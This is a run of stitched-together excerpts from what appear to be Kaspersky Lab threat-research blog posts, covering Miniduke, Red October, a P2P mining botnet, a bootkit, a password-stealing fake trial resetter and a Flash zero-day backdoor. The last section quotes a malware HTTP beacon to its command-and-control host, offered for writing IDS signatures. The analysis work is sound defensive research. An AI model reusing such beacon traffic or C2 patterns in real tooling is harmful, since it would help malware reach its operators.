11 Mar Miniduke: web based infection vector Igor Soumenkov
17 Jan "Red October" - part two, the modules GReAT
12 Oct Stealing currency permits from the Government Dmitry Bestuzhev
10 Oct Hidden details about the last Skype spread malware Dmitry Bestuzhev
10 Nov Steganography or encryption in bankers? Dmitry Bestuzhev
19 Aug The Miner Botnet: Bitcoin Mining Goes Peer-To-Peer Tillmann Werner
Join our blog
You can contribute to our blog if you have +100 points. Comment on articles and blogposts, and other users will rate your comments. You receive points for positive ratings.
Together with our partner CrySyS Lab, we've discovered two new, previously-unknown infection mechanisms for Miniduke. These new infection vectors rely on Java and IE vulnerabilities to infect the victim's PC.
While inspecting one of the C&C servers of Miniduke, we have found files that were not related to the C&C code, but seemed to be prepared for infecting visitors using web-based vulnerabilities.
The page hxxp://[c2_hostname]/groups/business-principles.html is used as an starting point for the attack. It consists of two frames, one for loading the decoy web page from a legitimate website (copied from http://www.albannagroup.com/business-principles.html), and another for performing malicious activities (hxxp://[c2_hostname]/groups/sidebar.html)
Source code of business-principles.html
Decoy webpage loaded
Earlier this week, we published our report on “Red October”, a high-level cyber-espionage campaign that during the past five years has successfully infiltrated computer networks at diplomatic, governmental and scientific research organizations.
In part one, we covered the most important parts of the campaign: the anatomy of the attack, a timeline of the attacker’s operation, the geographical distribution of the victims, sinkhole information and presented a high level overview of the C&C infrastructure.
Today we are publishing part two of our research, which comprises over 140 pages of technical analysis of the modules used in the operation.
When analyzing targeted attacks, sometimes researchers focus on the superficial system infection and how that occurred. Sometimes, that is sufficient, but in the case of Kaspersky Lab, we have higher standards. This is why our philosophy is that it’s important to analyze not just the infection, but to answer three very important questions:
According to our knowledge, never before in the history of ITSec has an cyber-espionage operation been analyzed in such deep detail, with a focus on the modules used for attack and data exfiltration. In most cases, the analysis is compromised by the lack of access to the victim’s data; the researchers see only some of the modules and do not understand the full purpose of the attack or what was stolen.
To get around these hiccups, we set up several fake victims around the world and monitored how the attackers handled them over the course of several months. This allowed us to collect hundreds of attack modules and tools. In addition to these, we identified many other modules used in other attacks, which allowed us to gain a unique insight into the attack.
Identifying a botnet is not an easy task sometimes, especially when one gets lost in different components like droppers, infectors and other bad stuff. Some two weeks ago, Jose Nazario from Arbor Networks pointed me to a new varmint that appears to be another peer-to-peer bot. When executed, the program installs tons of stuff that holds a number of goodies, for example
However, we leave these aside for now and focus on the botnet's architecture instead, which is really just a channel for pushing software to infected machines. Scrabbling about in the installed programs finally brought up the actual bot, which we detect as Trojan.Win32.Miner.h. The binary has some layers of obfuscation to make analysis harder but eventually writes a UPX packed executable into a memory section from where to original binary can be restored.
One of the first things that come to attention is a list of 1953 hard-coded IP address strings that are contained in the binary. These addresses are contacted by the bot during its bootstrapping phase in order to join the peer-to-peer network.
We recently discovered a new bootkit, i.e. a malicious program which infects the hard drive’s boot sector. Kaspersky Lab detects it as Rookit.Win32.Fisp.a. The bootkit is distributed by Trojan-Downloader.NSIS.Agent.jd. The Trojan infects the computers of users who try to download a video clip from a fake Chinese porn site.
This downloader is remarkable in that it downloads other malicious programs using a NSIS engine and stores all links in the relevant NSIS-script.
Fragment of the NSIS script for Trojan-Downloader.NSIS.Agent.jd
The dropper Rootkit.Win32.Fisp.a is among the files downloaded by the Trojan-downloader. This malicious program infects the hard drive’s boot sector. More specifically, it saves the old MBR to the third sector and replaces it with its own. Starting with the fourth sector, it installs an encrypted driver and the remaining code.
Fragment from the start of the hard disk infected by Rootkit.Win32.Fisp.a
The word ‘leak’ has become rather popular in recent times, but few of us actually realize just how likely it is that our own personal information could be leaked. We protect our computers, our mobile devices, keep up to speed with the latest security issues, but there are still times when we become careless. In particular, I’m speaking about public computers like this one here:
This is a genuine public access computer I came across in a hotel I was staying at last week during a short vacation. I had to use the Internet quite urgently, and of course I understood that my personal data wasn’t completely safe and could end up in someone else’s hands. I decided to try a little experiment and the results clearly demonstrated that any of us could quite easily fall victim to our own personal ‘(Wiki)leaks’:
I’m sure very few people would want their documents, especially of this nature, falling into the hands of strangers, competitors or cybercriminals.
So, if you want to experience your own (Wiki)leaks, all you have to do is use public access computers on a regular basis at airports, in hotels, cafes, libraries etc. If you really have to use a public computer and you know a thing or two about IT security, check first of all to see if the computer is infected. Remember that antivirus scanning results don’t always reflect the real picture.
Secondly, check if the ‘save passwords’ option is activated in the browser.
Thirdly, if you are working with documents or photographs, try not to download them. Many of today’s email services allow you to work with them directly from your email account. If you do download something, don’t forget to delete it afterwards and clear it from the Recycle Bin.
It’s also worth looking at the computer itself to ensure that there are no devices between the port where the keyboard is plugged in and the keyboard itself. These devices can gather information and look something like this:
Other precautionary measures include either cleaning your Internet Activity History or, before going online, switching on the privacy mode that is included in numerous browsers these days.
I cleaned up the aforementioned computer and informed the hotel administration. I didn’t get a discount, but the hotel management was very grateful and promised that no more cybercriminals would be stealing money from their customers (although I’m not so sure about that).
On 14 January, my colleague Vyacheslav Zakorzhevsky published a blog on the dangers of using cracks and keygens.
The malware in question was primarily for stealing registration keys for popular software.
A few days ago, we found a new malicious application that disguises itself as a Kaspersky Trial Resetter (an application that can be used to reset a software evaluation period that has expired).
The new malware is detected as Trojan-PSW.MSIL.Agent.wx and only two vendors, including Kaspersky Lab, currently detect it.
The twist here is that instead of re-setting your trial period, it steals information saved on the computer, be it browser-saved passwords, or passwords saved by an application.
According to the PE header, the malicious software was created on 31 January 2011, although the first infection reports appeared on 6 February. One can only wonder how successful such an application can be? Read below to find out:
In 23 days, a total number of 1109 computers were infected with this password-stealing Trojan, with an average of 48 infections per day.
The top 5 targeted countries were:
What about the type of stolen accounts?
Among the stolen data, hundreds of website credentials were found, such as data for: web hosting, online stores, internet/mobile provider, social networks (LinkedIn, Twitter, Facebook, MySpace etc.), webmail, blogs, banking, instant messaging, online gaming etc.
Here is a list of the browsers targeted by the malicious program, as well as the number of users whose data were stolen:
Kaspersky Lab contacted the hosting provider of the drop zone who closed and deleted the accounts.
I hope these statistics will convince you that downloading pirated software is not a good idea.
1109 users who thought they were downloading a crack for a security solution ended up being infected.
It’s also clear that saving your passwords within your browser isn’t the best idea.
You may want to consider using a Password Management program, such as the Kaspersky Password Manager, which keeps all your passwords encrypted and immune to these sorts of attacks.
We are currently in the process of contacting the victims and informing them about the infection.
Yesterday, Adobe published an advisory about a critical vulnerability in their Flash Player that is already being actively exploited. The CVE number assigned to this bug is CVE-2010-3654. A fix is currently being prepared by Adobe. The exploit we are seeing right now has a payload which, while not being very sophisticated, holds several surprises.
When executed, the bot checks for command line options. The '-installkys' option installs the bot onto the victim machine. Interestingly enough, if you use the '-removekys' parameter the malware gets entirely removed from the system – a built in unistall. The malware then calls itself without any parameters and the malicious code is run. The screenshot below shows the code for parsing the command line parameters.
The binary drops a DLL, the actual malware, to the hard drive and scans the list of running processes for outlook.exe, iexplore.exe, and firefox.exe. If a matching process is found, the dropped DLL gets injected and executed as a new thread.
The injected code will send an HTTP request to news.mysundayparty.com every 5 minutes and download an encrypted configuration file. The DNS entry seems to be somewhat fluxy: it has a TTL of 1800 seconds, and the IP address it resolves to changes every now and then. A decrypted config file contains a list of commands to gather information about the infected host. This information is encrypted and sent back to the server. Here is a decoded config file:
Searching the web for strings from this file reveals an interesting connection with a piece of malware that was spreading at the beginning of this year. Similar to the current bot, this earlier virus exploits a zero-day vulnerability, collects information about the infected machine and sends it back to its master. A still earlier version is reported to exploit another Flash zero-day.
A nice thing is that each configuration download request contains all the necessary information to track down infected hosts in a network. Below is what the HTTP GET request for the config file looks like. The path contains one parameter assembled from the Windows host name and its IP address with the prefix '-nsunday' and is quite unique. Also note the Referer field, which is always set to http://www.yahoo.com/, and the characteristic Accept header. Constructing a reliable IDS signature should not be too hard.
GET /asp/kys_allow_get.asp?name=getkys.kys&hostname=PC-192.168.0.1-nsunday HTTP/1.1 Referer: http://www.yahoo.com/ Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:22.214.171.124) Gecko/2009021910 Firefox/3.0.7 Host: news.mysundayparty.com Cache-Control: no-cache
Kaspersky detects both the installer and the DLL as Backdoor.Win32.Sykipot.an. The exploit is heuristically detected as Exploit.Script.Generic.